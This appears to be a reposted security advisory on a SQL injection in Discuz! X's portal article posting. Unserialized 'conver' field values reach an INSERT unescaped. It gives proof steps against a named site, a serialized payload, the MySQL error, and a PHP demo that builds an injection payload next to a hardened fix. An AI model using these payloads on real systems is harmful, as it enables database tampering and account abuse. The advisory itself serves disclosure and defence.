Discuz! X is a community-oriented site building platform released by Comsenz. It bundles forums, personal spaces (SNS), portals and groups, and its application Open Platform is fully integrated so that a site can offer all of these as one service.
source/include/portalcp/portalcp_article.php
// line 90
if($_G['gp_conver']) {
    $converfiles = unserialize(stripcslashes($_G['gp_conver']));
    $setarr['pic'] = $converfiles['pic'];
    $setarr['thumb'] = $converfiles['thumb'];
    $setarr['remote'] = $converfiles['remote'];
}
Discuz! escapes incoming request values with addslashes() before they reach $_G['gp_*']; stripcslashes() strips that escaping again, unserialize() hands back raw strings, and $converfiles is never passed through addslashes()/daddslashes() before its values are copied into $setarr.
$aid = DB::insert('portal_article_title', $setarr, 1); // line 122
The unescaped values go straight into the INSERT query, so this is a SQL injection bug: any single quote in the pic, thumb or remote value closes the string literal and the rest of the value is executed as SQL.
Proof of vulnerability:
Portal > Portal management > channel article posting permission (the account used must be allowed to post articles in the channel).
Post to:
http://www.bkjia.com/portal.php?mod=portalcp&ac=article&catid=1
Use Firebug to reveal the hidden conver form field.
Fill in a serialized array such as
a:3:{s:3:"pic";s:3:"xx";s:5:"thumb";s:2:"xx";s:6:"remote";s:2:"xx";}
(as reproduced here the pic value shows two characters against a declared length of 3, so the quote that breaks the query appears to have been lost in extraction; in a working payload every s:N must equal the byte length of the string that follows, otherwise unserialize() returns false and nothing is inserted).
Submitting the form produces an error.
Error messages:
* [Type] The query statement is incorrect.
* [1064] You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near xx, 'remote' = xx, 'uid' = 1, 'username' = admin, 'id' = 0 at line 1
* [Query] insert into portal_article_title SET 'title' = xxxxxxxx, 'Your title' = , 'author' = , 'from' = , 'fromurl' = , 'dateline' = 1301158320, 'url' = , 'allowcomment' = 1, 'summary' = xxxxxxxxxxxxxx, 'prename' = , 'preurl' = , 'catid' = 1, 'tag' = 0, 'status' = 0, 'pic' = xx, 'thumb' = xx, 'remote' = xx, 'uid' = 1, 'username' = admin, 'id' = 0
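The following PHP script is an added example, not code from Discuz! or from the advisory author. It reproduces the chain described in the code analysis above (GPC escaping, stripcslashes(), unserialize(), DB::insert()) in a self-contained form, next to a hardened version, and builds the kind of serialized payload the proof of vulnerability submits in the conver field. The function names simulate_gp(), build_insert(), vulnerable(), hardened() and escape_recursive(), the table stand-in and the payload contents are all assumptions made for this demo.

```php
<?php
// Added example; not code from Discuz! or the advisory. It reproduces the
// conver handling of portalcp_article.php in a self-contained script and
// shows a hardened variant. All function names are assumptions for this demo.

// Discuz! X runs addslashes() over request values before they land in
// $_G['gp_*']; simulate that for one POSTed field.
function simulate_gp(string $raw): string
{
    return addslashes($raw);
}

// Stand-in for DB::insert(): build the SET clause as quoted key/value pairs,
// the shape visible in the error message on this page.
function build_insert(string $table, array $setarr): string
{
    $pairs = [];
    foreach ($setarr as $key => $value) {
        $pairs[] = "`$key`='$value'";
    }
    return "INSERT INTO $table SET " . implode(', ', $pairs);
}

// Vulnerable path, mirroring the original logic: stripcslashes() undoes the
// GPC escaping, unserialize() yields raw strings, nothing re-escapes them.
function vulnerable(string $gp_conver): string
{
    $converfiles = unserialize(stripcslashes($gp_conver));
    $setarr = [
        'pic'    => $converfiles['pic'],
        'thumb'  => $converfiles['thumb'],
        'remote' => $converfiles['remote'],
    ];
    return build_insert('portal_article_title', $setarr);
}

// addslashes() applied to every leaf of an array (what Discuz!'s own
// daddslashes() helper does), used to re-escape the unserialized values.
function escape_recursive($value)
{
    if (is_array($value)) {
        return array_map('escape_recursive', $value);
    }
    return addslashes((string) $value);
}

// Hardened path: forbid object instantiation during unserialize(), reject
// anything that is not a plain array with the three expected string keys,
// then re-escape before the values reach the query.
function hardened(string $gp_conver): ?string
{
    $converfiles = @unserialize(stripcslashes($gp_conver), ['allowed_classes' => false]);
    if (!is_array($converfiles)) {
        return null; // malformed payload: nothing is inserted
    }
    foreach (['pic', 'thumb', 'remote'] as $key) {
        if (!isset($converfiles[$key]) || !is_string($converfiles[$key])) {
            return null;
        }
    }
    $converfiles = escape_recursive($converfiles);
    $setarr = [
        'pic'    => $converfiles['pic'],
        'thumb'  => $converfiles['thumb'],
        'remote' => $converfiles['remote'],
    ];
    return build_insert('portal_article_title', $setarr);
}

// Constructed attacker payload: a serialized array whose pic value carries a
// single quote and a trailing SQL comment. Each s:N length must equal the
// byte length of the string that follows, or unserialize() returns false.
$pic = "xx', `uid`='1' -- ";
$payload = 'a:3:{'
    . 's:3:"pic";s:' . strlen($pic) . ':"' . $pic . '";'
    . 's:5:"thumb";s:2:"xx";'
    . 's:6:"remote";s:2:"xx";'
    . '}';

$gp = simulate_gp($payload);
echo vulnerable($gp), "\n"; // the quote survives: the pic literal is closed and uid is attacker-controlled
echo hardened($gp), "\n";   // the quote is escaped: the whole value is stored as literal data
```

Run it with `php demo.php`. The first line of output shows the pic string literal being closed and the attacker's `uid` assignment appended to the SET clause; the second shows the same bytes stored as an ordinary string. The minimal fix in the real code is to run $converfiles through daddslashes() (and to check that unserialize() actually returned an array) before copying its values into $setarr.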
Author: Jannock; edited by Qing